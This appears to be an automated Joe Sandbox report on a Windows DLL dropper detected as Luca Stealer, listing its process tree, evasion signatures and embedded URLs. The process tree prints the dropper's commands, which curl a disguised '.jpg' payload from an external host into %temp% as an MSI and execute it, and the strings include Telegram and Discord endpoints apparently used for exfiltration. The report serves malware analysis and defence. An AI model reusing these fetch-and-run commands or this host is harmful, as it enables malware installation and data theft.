Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Overview

General Information

Sample Name:SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Analysis ID:756307
MD5:977f29431f9233f22f51b3d27e8abc28
SHA1:7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256:b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags:exe
Infos:

Detection

Luca Stealer
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Luca Stealer
Queries memory information (via WMI often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 1096 cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)
    • conhost.exe (PID: 68 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4304 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6056 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • cmd.exe (PID: 6020 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • curl.exe (PID: 6088 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
        • cmd.exe (PID: 5180 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • msiexec.exe (PID: 4792 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 6000 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 6012 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 6080 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 6096 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 5804 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
    • rundll32.exe (PID: 1668 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen MD5: 73C519F050C20580F8A62C849D49215A)
      • cmd.exe (PID: 4696 cmdline: cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • curl.exe (PID: 5272 cmdline: curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
      • cmd.exe (PID: 2764 cmdline: cmd /C %temp%\spclwow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 1708 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 3660 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5260 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 1400 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 4272 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 3560 cmdline: "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 1916 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msiexec.exe (PID: 5104 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 4988 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 4968 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 5736 cmdline: "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 4780 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msiexec.exe (PID: 5396 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 5444 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 5292 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 3328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UIServices.exe (PID: 3928 cmdline: "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A)
      • icacls.exe (PID: 2140 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: UIServices.exe PID: 3560JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
    Process Memory Space: UIServices.exe PID: 5736JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
      Process Memory Space: UIServices.exe PID: 3928JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
        Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior
        Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000025.00000003.305737619.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmp, expand.exe, 0000002D.00000003.365492953.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000035.00000003.418909523.0000000003231000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.458293973.00007FFC23C70000.00000002.00000001.01000000.0000000D.sdmp
        Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.10.dr
        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:
        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
        Source: curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265338006.00000237F57CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg
        Source: cmd.exe, 00000005.00000002.258487106.000001E808BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.257861385.0000021271D60000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.265592954.000001E1230F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
        Source: curl.exe, 00000009.00000002.258205394.0000017782120000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.257455250.000001840CB40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e00630068006500
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: http://ip-api.com/json/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: http://ipwhois.app/json/
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://api.telegram.org/bot
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://curl.se/docs/alt-svc.html
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://curl.se/docs/hsts.html
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://curl.se/docs/http-cookies.html
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/DDiscordBot
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/applications//commands/
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/channels/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/guilds/iconbannerjoined_atstring
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/interactions//callback
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/oauth2/applications/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/users/
        Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/
        Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
